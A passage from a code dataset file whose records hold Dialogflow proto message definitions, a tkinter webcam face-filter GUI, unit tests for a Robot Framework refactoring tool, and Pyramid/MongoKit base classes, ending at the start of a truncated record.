        \n \"\"\"\n\n text = proto.Field(proto.STRING, number=1,)\n entity_type = proto.Field(proto.STRING, number=2,)\n formatted_value = proto.Field(proto.MESSAGE, number=3, message=struct_pb2.Value,)\n\n\nclass MessageAnnotation(proto.Message):\n r\"\"\"Represents the result of annotation for the message.\n Attributes:\n parts (Sequence[google.cloud.dialogflow_v2beta1.types.AnnotatedMessagePart]):\n Optional. The collection of annotated message parts ordered\n by their position in the message. You can recover the\n annotated message by concatenating\n [AnnotatedMessagePart.text].\n contain_entities (bool):\n Required. Indicates whether the text message\n contains entities.\n \"\"\"\n\n parts = proto.RepeatedField(\n proto.MESSAGE, number=1, message=\"AnnotatedMessagePart\",\n )\n contain_entities = proto.Field(proto.BOOL, number=2,)\n\n\nclass ArticleAnswer(proto.Message):\n r\"\"\"Represents article answer.\n Attributes:\n title (str):\n The article title.\n uri (str):\n The article URI.\n snippets (Sequence[str]):\n Output only. Article snippets.\n metadata (Sequence[google.cloud.dialogflow_v2beta1.types.ArticleAnswer.MetadataEntry]):\n A map that contains metadata about the answer\n and the document from which it originates.\n answer_record (str):\n The name of answer record, in the format of\n \"projects//locations//answerRecords/\".\n \"\"\"\n\n title = proto.Field(proto.STRING, number=1,)\n uri = proto.Field(proto.STRING, number=2,)\n snippets = proto.RepeatedField(proto.STRING, number=3,)\n metadata = proto.MapField(proto.STRING, proto.STRING, number=5,)\n answer_record = proto.Field(proto.STRING, number=6,)\n\n\nclass FaqAnswer(proto.Message):\n r\"\"\"Represents answer from \"frequently asked questions\".\n Attributes:\n answer (str):\n The piece of text from the ``source`` knowledge base\n document.\n confidence (float):\n The system's confidence score that this\n Knowledge answer is a good match for this\n conversational query, range from 0.0 (completely\n uncertain) to 1.0 (completely certain).\n question (str):\n The corresponding FAQ question.\n source (str):\n Indicates which Knowledge Document this answer was extracted\n from. Format:\n ``projects//locations//agent/knowledgeBases//documents/``.\n metadata (Sequence[google.cloud.dialogflow_v2beta1.types.FaqAnswer.MetadataEntry]):\n A map that contains metadata about the answer\n and the document from which it originates.\n answer_record (str):\n The name of answer record, in the format of\n \"projects//locations//answerRecords/\".\n \"\"\"\n\n answer = proto.Field(proto.STRING, number=1,)\n confidence = proto.Field(proto.FLOAT, number=2,)\n question = proto.Field(proto.STRING, number=3,)\n source = proto.Field(proto.STRING, number=4,)\n metadata = proto.MapField(proto.STRING, proto.STRING, number=5,)\n answer_record = proto.Field(proto.STRING, number=6,)\n\n\nclass SmartReplyAnswer(proto.Message):\n r\"\"\"Represents a smart reply answer.\n Attributes:\n reply (str):\n The content of the reply.\n confidence (float):\n Smart reply confidence.\n The system's confidence score that this reply is\n a good match for this conversation, as a value\n from 0.0 (completely uncertain) to 1.0\n (completely certain).\n answer_record (str):\n The name of answer record, in the format of\n \"projects//locations//answerRecords/\".\n \"\"\"\n\n reply = proto.Field(proto.STRING, number=1,)\n confidence = proto.Field(proto.FLOAT, number=2,)\n answer_record = proto.Field(proto.STRING, number=3,)\n\n\nclass SuggestionResult(proto.Message):\n r\"\"\"One response of different type of suggestion response which is used\n in the response of\n [Participants.AnalyzeContent][google.cloud.dialogflow.v2beta1.Participants.AnalyzeContent]\n and\n [Participants.AnalyzeContent][google.cloud.dialogflow.v2beta1.Participants.AnalyzeContent],\n as well as\n [HumanAgentAssistantEvent][google.cloud.dialogflow.v2beta1.HumanAgentAssistantEvent].\n\n Attributes:\n error (google.rpc.status_pb2.Status):\n Error status if the request failed.\n suggest_articles_response (google.cloud.dialogflow_v2beta1.types.SuggestArticlesResponse):\n SuggestArticlesResponse if request is for\n ARTICLE_SUGGESTION.\n suggest_faq_answers_response (google.cloud.dialogflow_v2beta1.types.SuggestFaqAnswersResponse):\n SuggestFaqAnswersResponse if request is for FAQ_ANSWER.\n suggest_smart_replies_response (google.cloud.dialogflow_v2beta1.types.SuggestSmartRepliesResponse):\n SuggestSmartRepliesResponse if request is for SMART_REPLY.\n \"\"\"\n\n error = proto.Field(\n proto.MESSAGE, number=1, oneof=\"suggestion_response\", message=status_pb2.Status,\n )\n suggest_articles_response = proto.Field(\n proto.MESSAGE,\n number=2,\n oneof=\"suggestion_response\",\n message=\"SuggestArticlesResponse\",\n )\n suggest_faq_answers_response = proto.Field(\n proto.MESSAGE,\n number=3,\n oneof=\"suggestion_response\",\n message=\"SuggestFaqAnswersResponse\",\n )\n suggest_smart_replies_response = proto.Field(\n proto.MESSAGE,\n number=4,\n oneof=\"suggestion_response\",\n message=\"SuggestSmartRepliesResponse\",\n )\n\n\nclass SuggestArticlesRequest(proto.Message):\n r\"\"\"The request message for\n [Participants.SuggestArticles][google.cloud.dialogflow.v2beta1.Participants.SuggestArticles].\n\n Attributes:\n parent (str):\n Required. The name of the participant to fetch suggestion\n for. Format:\n ``projects//locations//conversations//participants/``.\n latest_message (str):\n Optional. The name of the latest conversation message to\n compile suggestion for. If empty, it will be the latest\n message of the conversation.\n\n Format:\n ``projects//locations//conversations//messages/``.\n context_size (int):\n Optional. Max number of messages prior to and including\n [latest_message][google.cloud.dialogflow.v2beta1.SuggestArticlesRequest.latest_message]\n to use as context when compiling the suggestion. By default\n 20 and at most 50.\n \"\"\"\n\n parent = proto.Field(proto.STRING, number=1,)\n latest_message = proto.Field(proto.STRING, number=2,)\n context_size = proto.Field(proto.INT32, number=3,)\n\n\nclass SuggestArticlesResponse(proto.Message):\n r\"\"\"The response message for\n [Participants.SuggestArticles][google.cloud.dialogflow.v2beta1.Participants.SuggestArticles].\n\n Attributes:\n article_answers (Sequence[google.cloud.dialogflow_v2beta1.types.ArticleAnswer]):\n Output only. Articles ordered by score in\n descending order.\n latest_message (str):\n The name of the latest conversation message used to compile\n suggestion for.\n\n Format:\n ``projects//locations//conversations//messages/``.\n context_size (int):\n Number of messages prior to and including\n [latest_message][google.cloud.dialogflow.v2beta1.SuggestArticlesResponse.latest_message]\n to compile the suggestion. It may be smaller than the\n [SuggestArticlesResponse.context_size][google.cloud.dialogflow.v2beta1.SuggestArticlesResponse.context_size]\n field in the request if there aren't that many messages in\n the conversation.\n \"\"\"\n\n article_answers = proto.RepeatedField(\n proto.MESSAGE, number=1, message=\"ArticleAnswer\",\n )\n latest_message = proto.Field(proto.STRING, number=2,)\n context_size = proto.Field(proto.INT32, number=3,)\n\n\nclass SuggestFaqAnswersRequest(proto.Message):\n r\"\"\"The request message for\n [Participants.SuggestFaqAnswers][google.cloud.dialogflow.v2beta1.Participants.SuggestFaqAnswers].\n\n Attributes:\n parent (str):\n Required. The name of the participant to fetch suggestion\n for. Format:\n ``projects//locations//conversations//participants/``.\n latest_message (str):\n Optional. The name of the latest conversation message to\n compile suggestion for. If empty, it will be the latest\n message of the conversation.\n\n Format:\n ``projects//locations//conversations//messages/``.\n context_size (int):\n Optional. Max number of messages prior to and including\n [latest_message] to use as context when compiling the\n suggestion. By default 20 and at most 50.\n \"\"\"\n\n parent = proto.Field(proto.STRING, number=1,)\n latest_message = proto.Field(proto.STRING, number=2,)\n context_size = proto.Field(proto.INT32, number=3,)\n\n\nclass SuggestFaqAnswersResponse(proto.Message):\n r\"\"\"The request message for\n [Participants.SuggestFaqAnswers][google.cloud.dialogflow.v2beta1.Participants.SuggestFaqAnswers].\n\n Attributes:\n faq_answers (Sequence[google.cloud.dialogflow_v2beta1.types.FaqAnswer]):\n Output only. Answers extracted from FAQ\n documents.\n latest_message (str):\n The name of the latest conversation message used to compile\n suggestion for.\n\n Format:\n ``projects//locations//conversations//messages/``.\n context_size (int):\n Number of messages prior to and including\n [latest_message][google.cloud.dialogflow.v2beta1.SuggestFaqAnswersResponse.latest_message]\n to compile the suggestion. It may be smaller than the\n [SuggestFaqAnswersRequest.context_size][google.cloud.dialogflow.v2beta1.SuggestFaqAnswersRequest.context_size]\n field in the request if there aren't that many messages in\n the conversation.\n \"\"\"\n\n faq_answers = proto.RepeatedField(proto.MESSAGE, number=1, message=\"FaqAnswer\",)\n latest_message = proto.Field(proto.STRING, number=2,)\n context_size = proto.Field(proto.INT32, number=3,)\n\n\nclass SuggestSmartRepliesRequest(proto.Message):\n r\"\"\"The request message for\n [Participants.SuggestSmartReplies][google.cloud.dialogflow.v2beta1.Participants.SuggestSmartReplies].\n\n Attributes:\n parent (str):\n Required. The name of the participant to fetch suggestion\n for. Format:\n ``projects//locations//conversations//participants/``.\n current_text_input (google.cloud.dialogflow_v2beta1.types.TextInput):\n The current natural language text segment to\n compile suggestion for. This provides a way for\n user to get follow up smart reply suggestion\n after a smart reply selection, without sending a\n text message.\n latest_message (str):\n The name of the latest conversation message to compile\n suggestion for. If empty, it will be the latest message of\n the conversation.\n\n Format:\n ``projects//locations//conversations//messages/``.\n context_size (int):\n Optional. Max number of messages prior to and including\n [latest_message] to use as context when compiling the\n suggestion. By default 20 and at most 50.\n \"\"\"\n\n parent = proto.Field(proto.STRING, number=1,)\n current_text_input = proto.Field(\n proto.MESSAGE, number=4, message=session.TextInput,\n )\n latest_message = proto.Field(proto.STRING, number=2,)\n context_size = proto.Field(proto.INT32, number=3,)\n\n\nclass SuggestSmartRepliesResponse(proto.Message):\n r\"\"\"The response message for\n [Participants.SuggestSmartReplies][google.cloud.dialogflow.v2beta1.Participants.SuggestSmartReplies].\n\n Attributes:\n smart_reply_answers (Sequence[google.cloud.dialogflow_v2beta1.types.SmartReplyAnswer]):\n Output only. Multiple reply options provided\n by smart reply service. The order is based on\n the rank of the model prediction. The maximum\n number of the returned replies is set in\n SmartReplyConfig.\n latest_message (str):\n The name of the latest conversation message used to compile\n suggestion for.\n\n Format:\n ``projects//locations//conversations//messages/``.\n context_size (int):\n Number of messages prior to and including\n [latest_message][google.cloud.dialogflow.v2beta1.SuggestSmartRepliesResponse.latest_message]\n to compile the suggestion. It may be smaller than the\n [SuggestSmartRepliesRequest.context_size][google.cloud.dialogflow.v2beta1.SuggestSmartRepliesRequest.context_size]\n field in the request if there aren't that many messages in\n the conversation.\n \"\"\"\n\n smart_reply_answers = proto.RepeatedField(\n proto.MESSAGE, number=1, message=\"SmartReplyAnswer\",\n )\n latest_message = proto.Field(proto.STRING, number=2,)\n context_size = proto.Field(proto.INT32, number=3,)\n\n\nclass Suggestion(proto.Message):\n r\"\"\"Represents a suggestion for a human agent.\n Attributes:\n name (str):\n Output only. The name of this suggestion. Format:\n ``projects//locations//conversations//participants/*/suggestions/``.\n articles (Sequence[google.cloud.dialogflow_v2beta1.types.Suggestion.Article]):\n Output only. Articles ordered by score in\n descending order.\n faq_answers (Sequence[google.cloud.dialogflow_v2beta1.types.Suggestion.FaqAnswer]):\n Output only. Answers extracted from FAQ\n documents.\n create_time (google.protobuf.timestamp_pb2.Timestamp):\n Output only. The time the suggestion was\n created.\n latest_message (str):\n Output only. Latest message used as context to compile this\n suggestion.\n\n Format:\n ``projects//locations//conversations//messages/``.\n \"\"\"\n\n class Article(proto.Message):\n r\"\"\"Represents suggested article.\n Attributes:\n title (str):\n Output only. The article title.\n uri (str):\n Output only. The article URI.\n snippets (Sequence[str]):\n Output only. Article snippets.\n metadata (Sequence[google.cloud.dialogflow_v2beta1.types.Suggestion.Article.MetadataEntry]):\n Output only. A map that contains metadata\n about the answer and the document from which it\n originates.\n answer_record (str):\n Output only. The name of answer record, in\n the format of \"projects//locations//answerRecords/\".\n \"\"\"\n\n title = proto.Field(proto.STRING, number=1,)\n uri = proto.Field(proto.STRING, number=2,)\n snippets = proto.RepeatedField(proto.STRING, number=3,)\n metadata = proto.MapField(proto.STRING, proto.STRING, number=5,)\n answer_record = proto.Field(proto.STRING, number=6,)\n\n class FaqAnswer(proto.Message):\n r\"\"\"Represents suggested answer from \"frequently asked\n questions\".\n\n Attributes:\n answer (str):\n Output only. The piece of text from the ``source`` knowledge\n base document.\n confidence (float):\n The system's confidence score that this\n Knowledge answer is a good match for this\n conversational query, range from 0.0 (completely\n uncertain) to 1.0 (completely certain).\n question (str):\n Output only. The corresponding FAQ question.\n source (str):\n Output only. Indicates which Knowledge Document this answer\n was extracted from. Format:\n ``projects//locations//agent/knowledgeBases//documents/``.\n metadata (Sequence[google.cloud.dialogflow_v2beta1.types.Suggestion.FaqAnswer.MetadataEntry]):\n Output only. A map that contains metadata\n about the answer and the document from which it\n originates.\n answer_record (str):\n Output only. The name of answer record, in\n the format of \"projects//locations//answerRecords/\".\n \"\"\"\n\n answer = proto.Field(proto.STRING, number=1,)\n confidence = proto.Field(proto.FLOAT, number=2,)\n question = proto.Field(proto.STRING, number=3,)\n source = proto.Field(proto.STRING, number=4,)\n metadata = proto.MapField(proto.STRING, proto.STRING, number=5,)\n answer_record = proto.Field(proto.STRING, number=6,)\n\n name = proto.Field(proto.STRING, number=1,)\n articles = proto.RepeatedField(proto.MESSAGE, number=2, message=Article,)\n faq_answers = proto.RepeatedField(proto.MESSAGE, number=4, message=FaqAnswer,)\n create_time = proto.Field(proto.MESSAGE, number=5, message=timestamp_pb2.Timestamp,)\n latest_message = proto.Field(proto.STRING, number=7,)\n\n\nclass ListSuggestionsRequest(proto.Message):\n r\"\"\"The request message for\n [Participants.ListSuggestions][google.cloud.dialogflow.v2beta1.Participants.ListSuggestions].\n\n Attributes:\n parent (str):\n Required. The name of the participant to fetch suggestions\n for. Format:\n ``projects//locations//conversations//participants/``.\n page_size (int):\n Optional. The maximum number of items to\n return in a single page. The default value is\n 100; the maximum value is 1000.\n page_token (str):\n Optional. The next_page_token value returned from a previous\n list request.\n filter (str):\n Optional. Filter on suggestions fields. Currently predicates\n on ``create_time`` and ``create_time_epoch_microseconds``\n are supported. ``create_time`` only support milliseconds\n accuracy. E.g.,\n ``create_time_epoch_microseconds > 1551790877964485`` or\n ``create_time > \"2017-01-15T01:30:15.01Z\"``\n\n For more information about filtering, see `API\n Filtering `__.\n \"\"\"\n\n parent = proto.Field(proto.STRING, number=1,)\n page_size = proto.Field(proto.INT32, number=2,)\n page_token = proto.Field(proto.STRING, number=3,)\n filter = proto.Field(proto.STRING, number=4,)\n\n\nclass ListSuggestionsResponse(proto.Message):\n r\"\"\"The response message for\n [Participants.ListSuggestions][google.cloud.dialogflow.v2beta1.Participants.ListSuggestions].\n\n Attributes:\n suggestions (Sequence[google.cloud.dialogflow_v2beta1.types.Suggestion]):\n Required. The list of suggestions. There will be a maximum\n number of items returned based on the page_size field in the\n request. ``suggestions`` is sorted by ``create_time`` in\n descending order.\n next_page_token (str):\n Optional. Token to retrieve the next page of\n results or empty if there are no more results in\n the list.\n \"\"\"\n\n @property\n def raw_page(self):\n return self\n\n suggestions = proto.RepeatedField(proto.MESSAGE, number=1, message=\"Suggestion\",)\n next_page_token = proto.Field(proto.STRING, number=2,)\n\n\nclass CompileSuggestionRequest(proto.Message):\n r\"\"\"The request message for\n [Participants.CompileSuggestion][google.cloud.dialogflow.v2beta1.Participants.CompileSuggestion].\n\n Attributes:\n parent (str):\n Required. The name of the participant to fetch suggestion\n for. Format:\n ``projects//locations//conversations//participants/``.\n latest_message (str):\n Optional. The name of the latest conversation message to\n compile suggestion for. If empty, it will be the latest\n message of the conversation.\n\n Format:\n ``projects//locations//conversations//messages/``.\n context_size (int):\n Optional. Max number of messages prior to and including\n [latest_message] to use as context when compiling the\n suggestion. If zero or less than zero, 20 is used.\n \"\"\"\n\n parent = proto.Field(proto.STRING, number=1,)\n latest_message = proto.Field(proto.STRING, number=2,)\n context_size = proto.Field(proto.INT32, number=3,)\n\n\nclass CompileSuggestionResponse(proto.Message):\n r\"\"\"The response message for\n [Participants.CompileSuggestion][google.cloud.dialogflow.v2beta1.Participants.CompileSuggestion].\n\n Attributes:\n suggestion (google.cloud.dialogflow_v2beta1.types.Suggestion):\n The compiled suggestion.\n latest_message (str):\n The name of the latest conversation message used to compile\n suggestion for.\n\n Format:\n ``projects//locations//conversations//messages/``.\n context_size (int):\n Number of messages prior to and including\n [latest_message][google.cloud.dialogflow.v2beta1.CompileSuggestionResponse.latest_message]\n to compile the suggestion. It may be smaller than the\n [CompileSuggestionRequest.context_size][google.cloud.dialogflow.v2beta1.CompileSuggestionRequest.context_size]\n field in the request if there aren't that many messages in\n the conversation.\n \"\"\"\n\n suggestion = proto.Field(proto.MESSAGE, number=1, message=\"Suggestion\",)\n latest_message = proto.Field(proto.STRING, number=2,)\n context_size = proto.Field(proto.INT32, number=3,)\n\n\nclass ResponseMessage(proto.Message):\n r\"\"\"Response messages from an automated agent.\n Attributes:\n text (google.cloud.dialogflow_v2beta1.types.ResponseMessage.Text):\n Returns a text response.\n payload (google.protobuf.struct_pb2.Struct):\n Returns a response containing a custom,\n platform-specific payload.\n live_agent_handoff (google.cloud.dialogflow_v2beta1.types.ResponseMessage.LiveAgentHandoff):\n Hands off conversation to a live agent.\n end_interaction (google.cloud.dialogflow_v2beta1.types.ResponseMessage.EndInteraction):\n A signal that indicates the interaction with\n the Dialogflow agent has ended.\n \"\"\"\n\n class Text(proto.Message):\n r\"\"\"The text response message.\n Attributes:\n text (Sequence[str]):\n A collection of text responses.\n \"\"\"\n\n text = proto.RepeatedField(proto.STRING, number=1,)\n\n class LiveAgentHandoff(proto.Message):\n r\"\"\"Indicates that the conversation should be handed off to a human\n agent.\n\n Dialogflow only uses this to determine which conversations were\n handed off to a human agent for measurement purposes. What else to\n do with this signal is up to you and your handoff procedures.\n\n You may set this, for example:\n\n - In the entry fulfillment of a CX Page if entering the page\n indicates something went extremely wrong in the conversation.\n - In a webhook response when you determine that the customer issue\n can only be handled by a human.\n\n Attributes:\n metadata (google.protobuf.struct_pb2.Struct):\n Custom metadata for your handoff procedure.\n Dialogflow doesn't impose any structure on this.\n \"\"\"\n\n metadata = proto.Field(proto.MESSAGE, number=1, message=struct_pb2.Struct,)\n\n class EndInteraction(proto.Message):\n r\"\"\"Indicates that interaction with the Dialogflow agent has\n ended.\n \"\"\"\n\n text = proto.Field(proto.MESSAGE, number=1, oneof=\"message\", message=Text,)\n payload = proto.Field(\n proto.MESSAGE, number=2, oneof=\"message\", message=struct_pb2.Struct,\n )\n live_agent_handoff = proto.Field(\n proto.MESSAGE, number=3, oneof=\"message\", message=LiveAgentHandoff,\n )\n end_interaction = proto.Field(\n proto.MESSAGE, number=4, oneof=\"message\", message=EndInteraction,\n )\n\n\n__all__ = tuple(sorted(__protobuf__.manifest))\n","sub_path":"google/cloud/dialogflow_v2beta1/types/participant.py","file_name":"participant.py","file_ext":"py","file_size_in_byte":47254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"459102091","text":"from tkinter import *\nimport cv2\nimport threading\nimport datetime\nimport os\nimport time\nfrom PIL import Image, ImageTk\nfrom FaceFilters import FaceFilters\n\nclass GUIFace:\n\tdef __init__(self, vs, fc, outPath):\n\t\tself.vs = vs\n\t\tself.fc = fc\n\t\tself.outPath = outPath\n\t\tself.frame = None\n\t\tself.thread = None\n\t\tself.stopEvent = None\n\t\tself.filterChoice = None\n\t\t# initialize the root window and video panel\n\t\tself.root = Tk()\n\t\tself.panel = None\n\n\n\t\tself.center = Frame(self.root, width=150, height=40,padx=10, pady=10)\n\t\tbtm_frame = Frame(self.root, bg='white', width=450, height=45, padx=3, pady=3)\n\t\tbtm_frame2 = Frame(self.root, bg='white', width=450, height=60)\n\n\t\t# layout all of the main containers\n\t\tself.root.grid_rowconfigure(1, weight=1)\n\t\tself.root.grid_columnconfigure(0, weight=1)\n\n\t\tself.center.grid(row=1)\n\t\tbtm_frame.grid(row=3)\n\t\tbtm_frame2.grid(row=4)\n\n\n\t\t# create the center widgets\n\t\tself.center.grid_rowconfigure(1, weight=1)\n\t\tself.center.grid_columnconfigure(1, weight=1)\n\n\t\t#panel = Frame(center, bg='yellow', width=250, height=210, padx=3, pady=3)\n\t\t#ctr_mid.grid(row=0, column=1, sticky=\"nsew\")\n\n\t\t# create the bottom widgets\n\t\tbtn1 = Button(btm_frame, text='Glasses', command=lambda: self.setFilterChoice(0), width = 20, fg = \"black\", bg = \"pink\", bd = 0)\n\t\tbtn2 = Button(btm_frame, text='Sunglasses1', command=lambda: self.setFilterChoice(1), width = 20, fg = \"black\", bg = \"light blue\", bd = 0)\n\t\tbtn3 = Button(btm_frame, text='Sunglasses2', command=lambda: self.setFilterChoice(2), width = 20, fg = \"black\", bg = \"aquamarine\", bd = 0)\n\t\tbtn4 = Button(btm_frame, text='Sunglasses3', command=lambda: self.setFilterChoice(3), width = 20, fg = \"black\", bg = \"light blue\", bd = 0)\n\t\tbtn5 = Button(btm_frame, text='Dog', command=lambda: self.setFilterChoice(4), width = 20, fg = \"black\", bg = \"pink\", bd = 0)\n\t\tbtn6 = Button(btm_frame, text='Rabbit', command=lambda: self.setFilterChoice(5), width = 20,fg = \"black\", bg = \"aquamarine\", bd = 0)\n\t\tbtn7 = Button(btm_frame, text='Moustache1', command=lambda: self.setFilterChoice(6), width = 20, fg = \"black\", bg = \"pink\", bd = 0)\n\t\tbtn8 = Button(btm_frame, text='Moustache2', command=lambda: self.setFilterChoice(7), width = 20, fg = \"black\", bg = \"light blue\", bd = 0)\n\t\tbtn9 = Button(btm_frame, text='Ironman', command=lambda: self.setFilterChoice(8), width = 20, fg = \"black\", bg = \"aquamarine\", bd = 0)\n\t\tbtn10 = Button(btm_frame, text='Captain America', command=lambda: self.setFilterChoice(9), width = 20, fg = \"black\", bg = \"light blue\", bd = 0)\n\n\t\t# layout the widgets in bottom frame\n\t\tbtn1.grid(row=0, column=1)\n\t\tbtn2.grid(row=0, column=2)\n\t\tbtn3.grid(row=0, column=3)\n\t\tbtn4.grid(row=0, column=4)\n\t\tbtn5.grid(row=0, column=5)\n\t\tbtn6.grid(row=1, column=1)\n\t\tbtn7.grid(row=1, column=2)\n\t\tbtn8.grid(row=1, column=3)\n\t\tbtn9.grid(row=1, column=4)\n\t\tbtn10.grid(row=1, column=5)\n\n\t\t# create the bottom2 widgets\n\t\tbtm_frame2.grid_columnconfigure(1, weight=1)\n\t\tsnapbtn = Button(btm_frame2, text='Snap!', command=self.takeSnapshot, width = 80, height=2, fg = \"black\", bg = \"lime green\", bd = 1)\n\t\tsnapbtn.grid(row=0, column=0,columnspan=3)\n\n\t\t# start a thread that constantly pools video sensor for most recently read frame\n\t\tself.stopEvent = threading.Event()\n\t\tself.videoLoop()\n\n\t\t#self.root.geometry('800x610')\n\t\tself.root.wm_title('Face Filters')\n\t\tself.root.wm_protocol('WM_DELETE_WINDOW', self.onClose)\n\t\tself.root.mainloop()\n\t\n\tdef videoLoop(self):\n\t\ttry:\n\n\t\t\tif not self.stopEvent.is_set():\n\t\t\t\t# keep looping over frames until instructed to stop\n\t\t\t\tself.frame = self.vs.read()\n\t\t\t\tif self.filterChoice!=None:\n\t\t\t\t\tself.frame = self.fc.applyFilter(self.frame, self.filterChoice)\n\t\t\t\tself.frame = cv2.flip(self.frame, 1)\n\t\t\t\tcv2image = cv2.cvtColor(self.frame, cv2.COLOR_BGR2RGBA)\n\t\t\t\timg = Image.fromarray(cv2image)\n\t\t\t\timg = ImageTk.PhotoImage(image=img)\n\n\t\t\t\t# if panel in not None, we need to initialize it\n\t\t\t\tif self.panel is None:\n\t\t\t\t\tself.panel = Label(self.center,image=img)\n\t\t\t\t\tself.panel.image = img\n\t\t\t\t\t#self.panel.pack(side='left', expand='yes', padx=10, pady=10)\n\t\t\t\t\tself.panel.grid(row=0, column=1, sticky=\"nsew\")\n\n\t\t\t\telse:\n\t\t\t\t\tself.panel.configure(image=img)\n\t\t\t\t\tself.panel.image = img\n\t\t\t\tself.panel.after(10,self.videoLoop)\n\t\texcept Exception as e:\n\t\t\tprint(\"[ERROR] {}\".format(e))\n\n\tdef setFilterChoice(self, n):\n\t\tself.filterChoice = n\n\t\tprint('[INFO] Filter selected: {}'.format(self.fc.filters[n]))\n\n\tdef takeSnapshot(self):\n\t\t# grab current timestamp and construct the output path\n\t\tts = datetime.datetime.now()\n\t\tfilename = '{}.jpg'.format(ts.strftime('%Y%b%d_%H%M%S'))\n\t\tp = os.path.sep.join((self.outPath, filename))\n\n\t\t# save file\n\t\tcv2.imwrite(p, self.frame.copy())\n\t\tprint(\"[INFO] saved {}\".format(filename))\n\n\tdef onClose(self):\n\t\t# set stop event, cleanup the camera\n\t\t# allow rest of the quit process to continue\n\t\tprint(\"[INFO] closing...\")\n\t\tself.stopEvent.set()\n\t\tself.vs.stop()\n\t\tself.root.quit()\n","sub_path":"faceTk.py","file_name":"faceTk.py","file_ext":"py","file_size_in_byte":4921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"153159463","text":"import unittest\nfrom init import test_data\nfrom python_package.rfrefactoring.refactoringFacade import RefactoringFacade\nfrom python_package.rfrefactoring.testDataVisitor import FindVisitor\nfrom python_package.rfrefactoring.reference import Reference\nfrom python_package.rfrefactoring.referencesMethods import get_present_method, get_replace_method\nclass RefactoringFacadeTest(unittest.TestCase):\n def setUp(self):\n self.facade = RefactoringFacade()\n self.root = self.facade.build(test_data)\n\n def test_rename_keyword_def(self):\n source = test_data+'/ezScrum.txt'\n login_ezScrum = self.facade.get_keyword_obj_from_file(self.root, 'Login EzScrum', source)\n new_kw_name = 'Login EzScrum V4'\n self.assertIsNotNone(login_ezScrum)\n self.facade.rename_keyword_def(login_ezScrum, new_kw_name)\n login_ezScrum_v4 = self.facade.get_keyword_obj_from_file(self.root, new_kw_name, source)\n self.assertIsNotNone(login_ezScrum_v4)\n \n def test_rename_variable_def(self):\n source = test_data+'/testResource.txt'\n variable = self.facade.get_variable_obj_from_file(self.root, '${resourceFileVariable}', source)\n new_var_name = 'resourceVariable'\n self.assertIsNotNone(variable)\n self.facade.rename_variable_def(variable, new_var_name)\n new_variable = self.facade.get_variable_obj_from_file(self.root, \"${%s}\" %new_var_name, source)\n self.assertIsNotNone(new_variable)\n\n def test_rename_keyword_references(self):\n source = test_data+'/ezScrum.txt'\n login_ezScrum = self.facade.get_keyword_obj_from_file(self.root, 'Login EzScrum', source)\n self.assertIsNotNone(login_ezScrum)\n references = self.facade.get_keyword_references(self.root, login_ezScrum)\n self.assertEqual(4, len(references))\n new_kw_name = 'Login EzScrum v3'\n total_references = []\n for reference in references:\n total_references.extend(reference['references'])\n self.assertEqual(6, len(total_references))\n self.facade.rename_keyword_references(total_references, login_ezScrum.name, new_kw_name)\n self.facade.rename_keyword_def(login_ezScrum, new_kw_name)\n login_ezScrum_v3 = self.facade.get_keyword_obj_from_file(self.root, new_kw_name, source)\n new_kw_references = self.facade.get_keyword_references(self.root, login_ezScrum_v3)\n self.assertEqual(4, len(new_kw_references))\n total_references_after_rename = []\n for reference in references:\n total_references_after_rename.extend(reference['references'])\n self.assertEqual(6 , len(total_references_after_rename))\n\n def test_rename_variable_references(self):\n source = test_data+'/testResource.txt'\n variable_name = '${resourceFileVariable}'\n new_var_name = 'newResourceVariable'\n resourceVariable = self.facade.get_variable_obj_from_file(self.root, variable_name, source)\n self.assertIsNotNone(resourceVariable)\n references = self.facade.get_variable_references(self.root, resourceVariable)\n self.assertEqual(1, len(references))\n total_references = []\n for reference in references:\n total_references.extend(reference['references'])\n self.assertEqual(4, len(total_references))\n self.facade.rename_variable_references(total_references, resourceVariable.name, new_var_name)\n self.facade.rename_variable_def(resourceVariable, new_var_name)\n newResourceVariable = self.facade.get_variable_obj_from_file(self.root, '${%s}' %new_var_name, source)\n new_kw_references = self.facade.get_variable_references(self.root, newResourceVariable)\n self.assertEqual(len(references), len(new_kw_references))\n total_references_after_rename = []\n for reference in references:\n total_references_after_rename.extend(reference['references'])\n self.assertEqual(len(total_references) , len(total_references_after_rename))","sub_path":"python_package/test/refactoringFacadeTest.py","file_name":"refactoringFacadeTest.py","file_ext":"py","file_size_in_byte":4006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"480423319","text":"\"\"\"\n:mod:`piano.libs.base`\n----------------------\n\n.. autoclass:: ContextBase\n :members:\n \n.. autoclass:: DocumentBase\n\n\"\"\"\nfrom piano.resources import interfaces as i\nfrom mongokit import Document\nfrom pyramid.traversal import find_interface, find_root\n\nclass ContextBase(dict):\n \"\"\" Base (abstract) class for all resources (contexts).\n \"\"\"\n __name__ = None\n __parent__ = None\n __app__ = None\n __site__ = None\n \n def __init__(self, key=None, parent=None,**kwargs):\n self.__name__ = key\n self.__parent__ = parent\n # Reference request\n self.request = find_root(self).request\n # Reference app and site\n self.__app__ = find_interface(self, i.IApp)\n self.__site__ = find_interface(self, i.ISite)\n # Assign kwargs to self (used as self.XXX not self['xxx'])\n for key in kwargs:\n setattr(self, key, kwargs[key])\n \n @property\n def appname(self):\n \"\"\"Returns the name of the application. \n \"\"\"\n return self.__app__.__name__\n \n @property\n def sitename(self):\n \"\"\"Returns the name of the site. \n \"\"\"\n return self.__site__.__name__\n \n def get_conn(self, app=None, site=None):\n \"\"\"Returns a raw MongoDB connection. If none of the arguments are\n set it will try to configure the connection based on the instances \n app and site name. Otherwise, it is up to you to choose the\n database and collection to use.\n \"\"\"\n mongo_conn = self.request.conn\n # If no app or site, autoconfigure the connection\n if app is None and site is None:\n return mongo_conn[self.appname][self.sitename]\n #If app or site, build up the connection\n if app is not None:\n mongo_conn = mongo_conn[app]\n if site is not None:\n mongo_conn = mongo_conn[site]\n return mongo_conn\n \n \nclass DocumentBase(Document):\n \"\"\" Base (abstract) class for all documents (MongoDB).\n \"\"\"\n #: Use MongoKit '.' notation\n use_dot_notation = False\n #: Require schemas to be defined up-front\n use_schemaless = False\n #: Validate models.\n skip_validation = False","sub_path":"build/lib/piano/lib/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"546800873","text":"#!/usr/bin/env python\n# -*- coding: 